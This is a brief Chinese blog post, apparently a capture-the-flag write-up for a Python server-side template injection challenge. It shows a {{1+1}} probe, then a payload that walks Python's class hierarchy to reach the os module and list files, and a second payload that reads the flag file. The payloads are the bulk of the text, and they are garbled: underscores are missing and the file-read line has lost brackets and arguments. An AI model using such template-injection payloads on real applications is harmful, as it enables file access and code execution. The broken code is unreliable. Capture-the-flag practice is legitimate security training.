您的位置: 首页 > 文章 > 攻防世界WEB高手进阶之python_template_injection 攻防世界WEB高手进阶之python_template_injection 分类: 文章 • 2022-10-08 00:27:49 打开网站是写着以下 然后测试以下{{1+1}}被执行了然后测试{{’’.class.mro[2].subclasses()[71].init.globals[‘os’].listdir(’.’)}}发现有一个flag使用{{’’.class.mro[2].subclasses()40.read()}}打开